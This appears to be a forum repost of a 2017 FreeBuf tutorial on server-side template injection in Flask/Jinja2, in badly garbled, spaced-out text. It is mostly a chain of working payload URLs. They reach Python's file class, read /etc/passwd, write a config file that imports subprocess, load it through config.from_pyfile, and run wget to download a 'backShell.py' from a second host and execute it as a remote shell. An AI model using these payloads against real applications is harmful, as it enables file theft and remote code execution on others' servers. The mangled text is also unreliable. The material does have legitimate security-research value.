搜索

[11452] 2017-06-13_FlaskJinja2开发中遇到的的服务端注入问题研究II

文档创建者:s7ckTeam
浏览次数:17
最后更新:2025-01-18
2017-06-13_FlaskJinja2开发中遇到的的服务端注入问题研究II F l a s k J i n j a 2     I I F o r r e s t X 3 8 6   F r e e B u f   2 0 1 7 - 0 6 - 1 3 0 x 0 0 .     F l a s k   J i n j a 2   < >   F l a s k J i n j a 2 S S T I 0 × 0 1 .   F l a s k / J i n j a 2   S S T I P O C p y t h o n   p a g e _ n o t _ f o u n d   S S T I F l a s k - t e s t . p y
C o n f i g . p y   p y t h o n   F l a s k - t e s t . p y   0 × 0 2 .   F l a s k / J i n j a 2   S S T I  
i n s t a n c e . _ _ c l a s s _ _   p y t h o n o b j e c t _ _ c l a s s _ _ 便 , . _ _ c l a s s _ _   < t y p e   s t r > _ _ m r o _ _ c l a s s . _ _ m r o _ _   p y t h o n _ _ m r o _ _   t u p l e t u p l e M R O M e t h o d   R e s o l u t i o n   O r d e r   h t t p : / / 1 0 . 1 . 1 0 0 . 3 : 5 0 0 0 / { { . _ _ c l a s s _ _ . _ _ m r o _ _ } } s t r b a s e s t r i n g - > o b j e c t _ _ s u b c l a s s e s _ _ ( )   _ _ s u b c l a s s e s _ _ ( ) p y t h o n o b j e c t o b j e c t _ _ s u b c l a s s e s _ _ ( ) f i l e o b j e c t h t t p : / / 1 0 . 1 . 1 0 0 . 3 : 5 0 0 0 / { { . _ _ c l a s s _ _ . _ _ m r o _ _ [ 2 ] . _ _ s u b c l a s s e s _ _ ( ) } } . _ _ c l a s s _ _ . _ _ m r o _ _ [ 2 ]   o b j e c t   < t y p e   o b j e c t >
f i l e ( < t y p e   f i l e > ) ,   f i l e     / e t c / p a s s w d h t t p : / / 1 0 . 1 . 1 0 0 . 3 : 5 0 0 0 / { { . _ _ c l a s s _ _ . _ _ m r o _ _ [ 2 ] . _ _ s u b c l a s s e s _ _ ( ) [ 4 0 ] ( / e t c / p a s s w d ) . r e a d ( ) } } 0 × 0 3 .   F l a s k / J i n j a 2   S S T I   1   p y / t m p / t m p . c f g 访 U R L h t t p : / / 1 0 . 1 . 1 0 0 . 3 : 5 0 0 0 / { { . _ _ c l a s s _ _ . _ _ m r o _ _ [ 2 ] . _ _ s u b c l a s s e s _ _ ( ) [ 4 0 ] ( / t m p / t m p . c f g ,   w ) . w r i t e ( f r o m   s u b p r o c e s s   i m p o r t   c h e c k _ o u t p u t n n R U N C M D   =   c h e c k _ o u t p u t n   ) } }   访 访 U R L n   / n ,   b u r p s u i t e   r e p e a t e r  
2   F l a s k   T e m p l a t e   G l o b a l s   c o n f i g p y F l a s k   J i n j a 2 r e n d e r _ t e m p l a t e _ s t r i n g   c o n t e x t     F l a s k   T e m p l a t e   G l o b a l s   c o n f i g F l a s k / c o n f i g . p y , f r o m _ p y f i l e   p y p y p y c o n f i g R U N C M D 访 h t t p : / / 1 0 . 1 . 1 0 0 . 3 : 5 0 0 0 / { { c o n f i g . f r o m _ p y f i l e ( / t m p / t m p . c f g ) } }
访 h t t p : / / 1 0 . 1 . 1 0 0 . 3 : 5 0 0 0 / { { c o n f i g . i t e m s ( ) } } R U N C M D c o n f i g R U N C M D s u b p r o c e s s . c h e c k _ o u t p u t 3   R U N C M D   s h e l l 访 h t t p : / / 1 0 . 1 . 1 0 0 . 3 : 5 0 0 0 / { { c o n f i g [ ' R U N C M D ' ] ( / u s r / b i n / w g e t   h t t p : / / 1 0 . 1 . 1 0 0 . 2 / b a c k S h e l l . p y   - O   / t m p / x ,   s h e l l = T r u e ) } } s h e l l 4   c o n f i g   f r o m _ p y f i l e s h e l l p y t h o n c l a s s   s h e l l   访 h t t p : / / 1 0 . 1 . 1 0 0 . 3 : 5 0 0 0 / { { c o n f i g . f r o m _ p y f i l e ( / t m p / x ) } }
s h e l l *   F o r r e s t X 3 8 6 F r e e B u f . C O M
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理